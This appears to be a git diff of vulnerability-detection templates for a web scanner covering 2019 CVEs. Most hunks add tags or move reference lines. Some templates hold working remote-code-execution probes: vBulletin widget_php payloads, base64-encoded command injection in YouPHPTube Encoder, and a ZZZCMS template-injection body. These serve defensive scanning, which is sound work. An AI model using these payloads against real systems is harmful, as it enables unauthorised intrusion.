name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,atlassian,rce
# Atlassian Crowd and Crowd Data Center
# had the pdkinstall development plugin incorrectly enabled in release builds.

4
cves/2019/CVE-2019-11581.yaml
View File

@ -6,9 +6,7 @@ info:
author: ree4pwn
severity: critical
reference: https://github.com/jas502n/CVE-2019-11581
product: Jira
# This is detection template only, use the referenced link for the exploitation.
tags: cve,cve2019,atlassian,jira,ssti,rce
requests:
- method: GET

1
cves/2019/CVE-2019-11869.yaml
View File

@ -15,6 +15,7 @@ info:
References:
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
- https://wpscan.com/vulnerability/9254
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- raw:

1
cves/2019/CVE-2019-12314.yaml
View File

@ -4,6 +4,7 @@ info:
name: Deltek Maconomy 2.2.5 LFIl
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET

1
cves/2019/CVE-2019-12461.yaml
View File

@ -4,6 +4,7 @@ info:
name: WebPort 1.19.1 - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
tags: cve,cve2019,xss
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/

1
cves/2019/CVE-2019-12593.yaml
View File

@ -4,6 +4,7 @@ info:
name: IIceWarp <=10.4.4 - Local File Inclusion
author: pikpikcu
severity: high
tags: cve,cve2019,lfi
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
# Google Dork:-Powered By IceWarp 10.4.4

1
cves/2019/CVE-2019-12725.yaml
View File

@ -12,6 +12,7 @@ info:
references: |
- https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
- https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
tags: cve,cve2019,rce
requests:
- method: GET

1
cves/2019/CVE-2019-14223.yaml
View File

@ -4,6 +4,7 @@ info:
name: Alfresco Share Open Redirect
author: pd-team
severity: low
tags: cve,cve2019,redirect
requests:
- method: POST

1
cves/2019/CVE-2019-14322.yaml
View File

@ -4,6 +4,7 @@ info:
name: Odoo 12.0 - Local File Inclusion
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET

5
cves/2019/CVE-2019-14696.yaml
View File

@ -4,9 +4,8 @@ info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
# Vendor Homepage: [https://open-school.org/]
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696
tags: cve,cve2019,xss
requests:
- method: GET

1
cves/2019/CVE-2019-14974.yaml
View File

@ -4,6 +4,7 @@ info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
tags: cve,cve2019,xss
requests:
- method: GET

26
cves/2019/CVE-2019-15043.yaml
View File

@ -3,21 +3,23 @@ info:
author: bing0o
name: Grafana unauthenticated API
severity: medium
tags: cve,cve2019,grafana
requests:
- body: >-
{"dashboard":
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
3600}
headers:
Content-Type: application/json
Host: '{{Hostname}}'
User-Agent: Mozilla/5.0
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers:
- part: body
type: word
words:
- deleteKey
method: POST
path:
- '{{BaseURL}}/api/snapshots'

5
cves/2019/CVE-2019-15107.yaml
View File

@ -4,9 +4,8 @@ info:
name: Webmin <= 1.920 Unauhenticated Remote Command Execution
author: bp0lr
severity: high
# Refrence:-https://www.exploit-db.com/exploits/47293
# Refrence:-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
tags: cve,cve2019,webmin,rce
requests:
- raw: #

1
cves/2019/CVE-2019-15858.yaml
View File

@ -13,6 +13,7 @@ info:
Source/References:
- https://github.com/GeneralEG/CVE-2019-15858
tags: cve,cve2019,wordpress,wp-pluing,xss
requests:
- method: GET

4
cves/2019/CVE-2019-16278.yaml
View File

@ -4,8 +4,8 @@ info:
author: pikpikcu
name: nostromo 1.9.6 - Remote Code Execution
severity: critical
# Source: https://www.exploit-db.com/raw/47837
reference: https://www.exploit-db.com/raw/47837
tags: cve,cve2019,rce
requests:
- raw:

1
cves/2019/CVE-2019-1653.yaml
View File

@ -4,6 +4,7 @@ info:
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
author: dwisiswant0
severity: high
tags: cve,cve2019,cisco
requests:
- method: GET

3
cves/2019/CVE-2019-16662.yaml
View File

@ -4,7 +4,8 @@ info:
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
# Source:-https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
tags: cve,cve2019,rce,intrusive
requests:
- method: GET

25
cves/2019/CVE-2019-16759-1.yaml
View File

@ -1,25 +0,0 @@
id: CVE-2019-16759-1
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"

16
cves/2019/CVE-2019-16759.yaml
View File

@ -1,20 +1,20 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4
author: dwisiswant0
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
tags: cve,cve2019,vbulletin,rce
requests:
- raw:
- |
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
- |
POST / HTTP/1.1
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
matchers-condition: and
matchers:
- type: status
@ -22,4 +22,4 @@ requests:
- 200
- type: word
words:
- "nonexistent:1337"
- "PHP Version"

5
cves/2019/CVE-2019-16920.yaml
View File

@ -5,9 +5,8 @@ info:
author: dwisiswant0
severity: critical
description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
# References:
# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
tags: cve,cve2019,dlink,rce
requests:
- raw:

3
cves/2019/CVE-2019-17382.yaml
View File

@ -4,7 +4,8 @@ info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: critical
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
tags: cve,cve2019,zabbix
requests:
- method: GET

1
cves/2019/CVE-2019-17506.yaml
View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
tags: cve,cve2019,dlink
requests:
- method: POST

3
cves/2019/CVE-2019-17558.yaml
View File

@ -4,9 +4,10 @@ info:
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
author: pikpikcu
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
requests:

4
cves/2019/CVE-2019-18394.yaml
View File

@ -4,8 +4,8 @@ info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
severity: critical
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
refrense: https://swarm.ptsecurity.com/openfire-admin-console/
tags: cve,cve2019,ssrf
requests:
- method: GET

1
cves/2019/CVE-2019-19368.yaml
View File

@ -4,6 +4,7 @@ info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET

1
cves/2019/CVE-2019-19781.yaml
View File

@ -4,6 +4,7 @@ info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
tags: cve,cve2019,citrix,traversal
requests:
- method: GET

1
cves/2019/CVE-2019-19908.yaml
View File

@ -4,6 +4,7 @@ info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET

4
cves/2019/CVE-2019-19985.yaml
View File

@ -4,8 +4,8 @@ info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
refrense: https://www.exploit-db.com/exploits/48698
tags: cve,cve2019,wordpress,wp-plugin
requests:
- method: GET

8
cves/2019/CVE-2019-20141.yaml
View File

@ -4,10 +4,10 @@ info:
name: Neon Dashboard - XSS Reflected
author: knassar702
severity: medium
description: |
An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
Source/References:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
refrense: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
tags: cve,cve2019,xss
requests:
- method: GET
path:

1
cves/2019/CVE-2019-2588.yaml
View File

@ -4,6 +4,7 @@ info:
name: Oracle Business Intelligence Path Traversal
author: madrobot
severity: high
tags: cve,cve2019,oracle,traversal
requests:
- method: GET

1
cves/2019/CVE-2019-2725.yaml
View File

@ -4,6 +4,7 @@ info:
name: Oracle WebLogic Server - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,oracle,weblogic,rce
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.

8
cves/2019/CVE-2019-3396.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2019-3396
info:
author: "Harsh Bothra"
name: "Atlassian Confluence Path Traversal"
author: Harsh Bothra
name: Atlassian Confluence Path Traversal
severity: high
# https://github.com/x-f1v3/CVE-2019-3396
refrense: https://github.com/x-f1v3/CVE-2019-3396
tags: cve,cve2019,atlassian,confluence,traversal,rce
requests:
- raw:

4
cves/2019/CVE-2019-3402.yaml
View File

@ -5,8 +5,8 @@ info:
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
# Source:- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
refrense: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
tags: cve,cve2019,atlassian,jira,xss
requests:
- method: GET

1
cves/2019/CVE-2019-3799.yaml
View File

@ -3,6 +3,7 @@ info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
tags: cve,cve2019,traversal
requests:
- method: GET

34
cves/2019/CVE-2019-5127.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2019-5127
info:
name: YouPHPTube Encoder RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
tags: cve,cve2019,rce
requests:
- method: GET
path:
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/objects/nuclei.txt"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "uid(.*)"
- "gid(.*)"
part: body
condition: and
- type: status
status:
- 200

3
cves/2019/CVE-2019-5418.yaml
View File

@ -4,7 +4,8 @@ info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
# reference: https://github.com/omarkurt/CVE-2019-5418
reference: https://github.com/omarkurt/CVE-2019-5418
tags: cve,cve2019,rails,traversal
requests:
- method: GET

11
cves/2019/CVE-2019-6112.yaml
View File

@ -4,14 +4,9 @@ info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
# A Cross-site scripting (XSS) vulnerability
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
# allows remote attackers to inject arbitrary web script or HTML
# via the keyword parameter (aka $search_term or the Search field).
# --
# References:
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
references: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- method: GET

2
cves/2019/CVE-2019-6340.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340
product: Drupal
tags: cve,cve2019,drupal,rce
requests:
- method: POST

1
cves/2019/CVE-2019-6715.yaml
View File

@ -5,6 +5,7 @@ info:
author: randomrobbie
severity: high
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
tags: cve,cve2019,wordpress,wp-pluing,ssrf
requests:
- raw:

1
cves/2019/CVE-2019-7219.yaml
View File

@ -4,6 +4,7 @@ info:
name: Zarafa WebApp Reflected XSS
author: pd-team
severity: low
tags: cve,cve2019,zarafa,xss
requests:
- method: GET

3
cves/2019/CVE-2019-7256.yaml
View File

@ -4,10 +4,11 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
refrence: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Refrence: https://www.exploit-db.com/exploits/47619
requests:
- raw: # Default Port

5
cves/2019/CVE-2019-7609.yaml
View File

@ -4,6 +4,8 @@ info:
name: Kibana Timelion Arbitrary Code Execution
author: dwisiswant0
severity: critical
reference: https://github.com/mpgn/CVE-2019-7609
tags: cve,cve2019,kibana,rce
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
@ -11,9 +13,6 @@ info:
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
# --
# References:
# - https://github.com/mpgn/CVE-2019-7609
requests:
- method: POST

17
cves/2019/CVE-2019-8442.yaml
View File

@ -3,11 +3,18 @@ info:
name: JIRA Directory Traversal
author: Kishore Krishna (siLLyDaddy)
severity: medium
tags: cve,cve2019,atlassian,jira,traversal
requests:
- method: GET
path:
- >-
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- raw:
- |
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
@ -16,4 +23,4 @@ requests:
- type: word
words:
- <groupId>com.atlassian.jira</groupId>
part: body
part: body

4
cves/2019/CVE-2019-8449.yaml
View File

@ -4,8 +4,8 @@ info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
reference: https://www.doyler.net/security-not-included/more-jira-enumeration
tags: cve,cve2019,atlassian,jira
requests:
- method: GET

5
cves/2019/CVE-2019-8451.yaml
View File

@ -2,8 +2,10 @@ id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: "TechbrunchFR"
author: TechbrunchFR
severity: medium
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
tags: cve,cve2019,atlassian,jira,ssrf
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
@ -13,7 +15,6 @@ info:
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817

1
cves/2019/CVE-2019-8903.yaml
View File

@ -4,6 +4,7 @@ info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
tags: cve,cve2019,totaljs,traversal
requests:
- method: GET

1
cves/2019/CVE-2019-8982.yaml
View File

@ -3,6 +3,7 @@ info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: high
tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
- method: GET

28
cves/2019/CVE-2019-9041.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2019-9041
info:
name: ZZZCMS 1.6.1 RCE
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-9041
tags: cve,cve2019,zzzcms,rce
requests:
- method: POST
path:
- "{{BaseURL}}/search/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
part: body
- type: status
status:
- 200

3
cves/2019/CVE-2019-9670.yaml
View File

@ -2,9 +2,10 @@ id: CVE-2019-9670
info:
name: Zimbra Collaboration XXE
description: "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability."
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
author: ree4pwn
severity: critical
tags: cve,cve2019,zimbra,xxe
requests:
- raw:

2
cves/2019/CVE-2019-9733.yaml
View File

@ -3,6 +3,8 @@ info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
severity: critical
tags: cve,cve2019,artifactory
requests:
- raw:
- |

Some files were not shown because too many files have changed in this diff Show More